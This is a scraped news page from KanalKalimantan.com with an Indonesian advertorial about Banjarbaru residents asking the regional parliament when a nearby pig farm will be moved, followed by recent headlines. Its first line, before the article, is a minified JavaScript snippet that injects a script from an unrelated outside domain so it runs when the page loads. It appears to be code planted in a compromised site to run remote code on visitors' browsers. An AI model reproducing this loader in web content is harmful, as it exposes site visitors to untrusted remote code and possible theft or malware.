(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
ADV DPRD BANJARBARU

Tagih Janji Penutupan Peternakan Babi, Warga Datangi Wakil Rakyat


KANALKALIMANTAN.COM BANJARBARU – Polemik aktivitas peternakan babi di Kelurahan Guntung Manggis, Kecamatan Landasan Ulin, mendapat sorotan banyak pihak. Usai, DPRD Banjarbaru menerima aspirasi para peternak hingga mengadakan pertemuan dengan pemerintah kota. Giliran sejumlah warga mendatangi kantor wakil rakyat pada Selasa (3/3/2020) siang.

Sedikitnya, ada 15 orang mendatangi kantor DPRD Banjarbaru dan mengaku merupakan warga yang berdiam di sekitar kawasan peternakan babi. Mereka datang dengan menggunakan 1 unit truk, bermaksud mengetahui ihwal agenda pemindahan ternak babi di wilayah mereka.

Namun, dari belasan orang tersebut, hanya 4 orang perwakilan yang diperkenankan masuk untuk secara langsung mendengar kejelasan dari wakil rakyat yang dalam hal ini Komisi III DPRD Banjarbaru.

Pertemuan tidak berlangsung lama, hanya membahas topik tentang sejauh mana wacana Pemerintah Kota Banjarbaru melakukan pemindahan peternakan babi yang awalnya dijadwalkan pada tanggal 29 Februari lalu. Namun disepakati bahwa tempo waktu tersebut justru diperpanjang hingga tanggal 25 April.

Ketua Komisi III DPRD Banjarbaru Takyin Baskoro mengatakan, jika ini merupakan bentuk aspirasi warga kepada wakil rakyat. Disebutkannya, sekelompok warga ini merupakan berasal dari sekitar lokasi peternakan.

“Mereka hanya menyampaikan aspirasi dengan menanyakan kapan kandang babi di Guntung Manggis  itu pindah. Lokasi tempat tinggal mereka memang berada yang paling dekat dengan lokasi peternakan babi, jadi bisa dikatakan merupakan warga yang terdampak,” kata Baskoro.

Walhasil, Baskoro mengaku dalam pertemuan tadi pihaknya hanya menjelaskan terkait perkembangan yang saat ini tengah berjalan. Tentunya, sesuai dengan hasil dari pertemuan dengan kelompok peternak babi maupun rapat dengar pendapat dengan pihak Pemko Banjarbaru.

“Sudah saya sampaikan kepada mereka bahwa ada kesepatan kesepakatan secara lisan untuk mengundur pemindahan kandang babi yakni hingga 25 April nanti. Nah, warga yang datang hari ini hanya ingin tahu kejelasan itu saja. Tidak ada aspirasi lebih,” aku politisi Nasdem tersebut.

Sementara itu, Ridwan (30) salah satu warga, berharap tidak ada lagi aktivitas peternakan babi di kawasan pemukimannya. Meskipun begitu, ia mengaku sebenarnya tidak melarang adanya aktivitas pertenakan babi di Kota Banjarbaru. Namun, sebagai catatan harus jauh dari pemukiman rumah warga.

“Informasi yang kita tahu, rencananya pemindahan tanggal 29 Februari lalu, tapi kok belum dilakukan. Nah, sekarang kita baru tahu ternyata diperpanjang sampai tanggal 25 April. Kita tidak masalah. Yang penting jangan molor lagi jadwalnya dan pindahnya juga harus jauh dari pemukiman,” harapnya. (kanalkalimantan.com/rico/adv)

Reporter : rico
Editor : bie

 


Al Ghifari

Recent Posts

Hari Museum Internasional 2024 “Museum untuk Pendidikan dan Penelitian”

KANALKALIMANTAN.COM - Hari Museum Internasional yang ditetapkan oleh ICOM dan dirayakan setiap tahun pada tanggal… Read More

4 jam ago

Masrumi dari Desa Sungai Namang HSU Raih Prestasi Nasional

KANALKALIMANTAN.COM, SOLO – Masrumi, guru honorer asal Desa Sungai Namang, Kecamatan Danau Panggang, Kabupaten Hulu… Read More

5 jam ago

Pemkab HSU Gelar Upacara HUT ke-75 Proklamasi ALRI Divisi IV Kalimantan

KANALKALIMANTAN.COM, AMUNTAI - Memperingati HUT ke-75 Proklamasi Pemerintahan Gubernur Tentara ALRI Divisi lV Pertahanan Kalimatan,… Read More

5 jam ago

Mantan Karyawan BPR Candi Agung Amuntai Dituntut 7 Tahun

Selewengkan Dana Nasabah, Rugikan Negara Rp779 Juta Read More

5 jam ago

Ungkap Kasus Curanmor di Banjarbaru, 4 Unit Motor Berplat Merah

7 Pelaku Ditangkap dengan Barbuk 21 Unit Sepeda Motor Read More

9 jam ago

Kontestan Kepala Daerah di Kalsel Ditantang Miliki Visi Majukan Perpustakaan

KANALKALIMANTAN.COM, BANJARMASIN - Tim Tenaga Ahli Gubernur Kalimantan Selatan (Kalsel) melakukan kunjungan ke Dinas Perpustakaan… Read More

11 jam ago

This website uses cookies.